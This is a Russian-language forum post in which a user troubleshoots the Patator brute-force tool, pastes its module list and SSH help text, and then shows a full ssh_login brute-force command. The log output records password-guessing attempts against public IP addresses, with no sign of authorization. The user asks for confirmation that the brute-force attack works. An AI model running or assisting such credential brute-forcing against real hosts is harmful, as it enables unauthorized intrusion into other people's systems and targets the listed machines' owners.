Версии pycurl и libcurl какие установлены?
Судя по чейнджлогу, PROXYTYPE_SOCKS4A появился в версии 7.19.5.1, которой требуется libcurl >= 7.19.0
		
		
	 
0.6 версия не капризная как 0.7. Запустилась 6 версия
--------------------------
$ python patator.py
Patator v0.6 (
	
	Ссылка скрыта от гостей
)
Usage: patator.py module --help
Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (
	
	Ссылка скрыта от гостей
)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward lookup names
  + dns_reverse   : Reverse lookup subnets
  + snmp_login    : Brute-force SNMP v1/2/3
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module
david@connectomix-second:~/patator$ patator.py ssh_login --help
-bash: patator.py: command not found
david@connectomix-second:~/patator$ ./ patator.py ssh_login --help
-bash: ./: Is a directory
david@connectomix-second:~/patator$ ./patator.py ssh_login --help
-bash: ./patator.py: Permission denied
david@connectomix-second:~/patator$ python patator.py ssh_login --help
Patator v0.6 (
	
	Ссылка скрыта от гостей
)
Usage: ssh_login <module-options ...> [global-options ...]
Examples:
  ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
Module options:
  host          : target host
  port          : target port [22]
  user          : usernames to test
  password      : passwords to test
  auth_type     : auth type to use [password|keyboard-interactive]
  persistent    : use persistent connections [1|0]
Global options:
  --version            show program's version number and exit
  -h, --help           show this help message and exit
  Execution:
    -x arg             actions and conditions, see Syntax below
    --start=N          start from offset N in the wordlist product
    --stop=N           stop at offset N
    --resume=r1[,rN]*  resume previous run
    -e arg             encode everything between two tags, see Syntax below
    -C str             delimiter string in combo files (default is ':')
    -X str             delimiter string in conditions (default is ',')
  Optimization:
    --rate-limit=N     wait N seconds between tests (default is 0)
    --max-retries=N    skip payload after N failures (default is 4) (-1 for
                       unlimited)
    -t N, --threads=N  number of threads (default is 10)
  Logging:
    -l DIR             save output and response data into DIR
    -L SFX             automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
                       (DIR defaults to '/tmp/patator')
  Debugging:
    -d, --debug        enable debug messages
Syntax:
-x actions:conditions
    actions    := action[,action]*
    action     := "ignore" | "retry" | "free" | "quit" | "reset"
    conditions := condition=value[,condition=value]*
    condition  := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep"
    ignore      : do not report
    retry       : try payload again
    free        : dismiss future similar payloads
    quit        : terminate execution now
    reset       : close current connection in order to reconnect next time
    code        : match status code
    size        : match size (N or N-M or N- or -N)
    time        : match time (N or N-M or N- or -N)
    mesg        : match message
    fgrep       : search for string in mesg
    egrep       : search for regex in mesg
For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'
-e tag:encoding
    tag        := any unique string (eg. T@G or _@@_ or ...)
    encoding   := "url" | "sha1" | "md5" | "hex" | "b64"
    url         : url encode
    sha1        : hash in sha1
    md5         : hash in md5
    hex         : encode in hexadecimal
    b64         : encode in base64
For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64
Please read the README inside for more examples and usage information.
---------------------------------------------------
При запуске SSH брута тоже ругается на этот путь: /usr/lib/python2.7/
$ cd patator
david@connectomix-second:~/patator$ python patator.py ssh_login host=FILE0 0=/home/david/ip.txt user=FILE1 1=/home/david/user.txt password=FILE2 2=/home/david/pass.txt
16:24:18 patator    INFO - Starting Patator v0.6 (
	
	Ссылка скрыта от гостей
) at 2018-01-17 16:24 EST
16:24:18 patator    INFO -                                                                         
16:24:18 patator    INFO - code  size   time | candidate                          |   num | mesg
16:24:18 patator    INFO - -----------------------------------------------------------------------------
/usr/lib/python2.7/dist-packages/Crypto/Cipher/blockalgo.py:141: FutureWarning: CTR mode needs counter parameter, not IV
  self._cipher = factory.new(key, *args, **kwargs)
16:24:21 patator    INFO - 1     22    2.704 | 162.144.92.81:user:michael         |     2 | Authentication failed.
16:24:21 patator    INFO - 1     22    2.768 | 162.144.92.81:user:maria           |     4 | Authentication failed.
16:24:21 patator    INFO - 1     22    2.712 | 162.144.92.81:user:john            |     5 | Authentication failed.
16:24:21 patator    INFO - 1     22    2.704 | 162.144.92.81:user:jose            |     6 | Authentication failed.
16:24:21 patator    INFO - 1     22    2.667 | 162.144.92.81:user:james           |     7 | Authentication failed.
16:24:55 patator    INFO - 0     24    0.132 | 67.252.134.226:user:michael        |   154 | SSH-2.0-dropbear_2015.67
16:24:56 patator    FAIL - xxx   70    0.000 | 67.252.134.226:user:maria          |   156 | <class 'paramiko.SSHException'> ('Error reading SSH protocol banner',)
16:24:56 patator    FAIL - xxx   70    0.000 | 67.252.134.226:user:james          |   159 | <class 'paramiko.SSHException'> ('Error reading SSH protocol banner',)
--------------------------------
Но работает вроде. Настройки нужно изучать. Работает брут? или нет? Ответь плиз по обоим постам.
Спасибо тебе за потраченное на меня время.
P.S. По этой ошибки "ctr mode needs counter parameter not iv" разбираюсь пока.